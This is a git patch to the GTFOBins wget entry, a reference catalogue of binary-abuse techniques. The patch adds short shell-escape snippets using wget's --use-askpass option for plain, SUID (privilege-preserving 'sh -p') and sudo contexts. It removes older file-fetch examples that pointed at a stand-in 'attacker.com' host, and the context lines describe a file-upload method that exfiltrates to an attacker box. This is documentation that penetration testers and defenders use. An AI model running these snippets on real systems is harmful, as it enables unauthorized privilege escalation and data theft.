From 01042c2aa1d7e4d47f027b987ba1b06287dac336 Mon Sep 17 00:00:00 2001
From: Emanuel Duss <me@emanuelduss.ch>
Date: Fri, 16 Dec 2022 16:33:15 +0100
Subject: [PATCH] Add wget shell via --use-askpass

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
---
 _gtfobins/wget.md | 26 ++++++++++++++++----------
 1 file changed, 16 insertions(+), 10 deletions(-)

diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index 52625c6..9ac126d 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -1,5 +1,11 @@
 ---
 functions:
+  shell:
+    - code: |
+        TF=$(mktemp)
+        chmod +x $TF
+        echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
+        wget --use-askpass=$TF 0
   file-upload:
     - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
       code: |
@@ -25,15 +31,15 @@ functions:
         LFILE=file_to_save
         wget $URL -O $LFILE
   suid:
-    - description: Fetch a remote file via HTTP GET request.
-      code: |
-        URL=http://attacker.com/file_to_get
-        LFILE=file_to_save
-        ./wget $URL -O $LFILE
+    - code: |
+        TF=$(mktemp)
+        chmod +x $TF
+        echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
+        ./wget --use-askpass=$TF 0
   sudo:
-    - description: Fetch a remote file via HTTP GET request.
-      code: |
-        URL=http://attacker.com/file_to_get
-        LFILE=file_to_save
-        sudo wget $URL -O $LFILE
+    - code: |
+        TF=$(mktemp)
+        chmod +x $TF
+        echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
+        sudo wget --use-askpass=$TF 0
 ---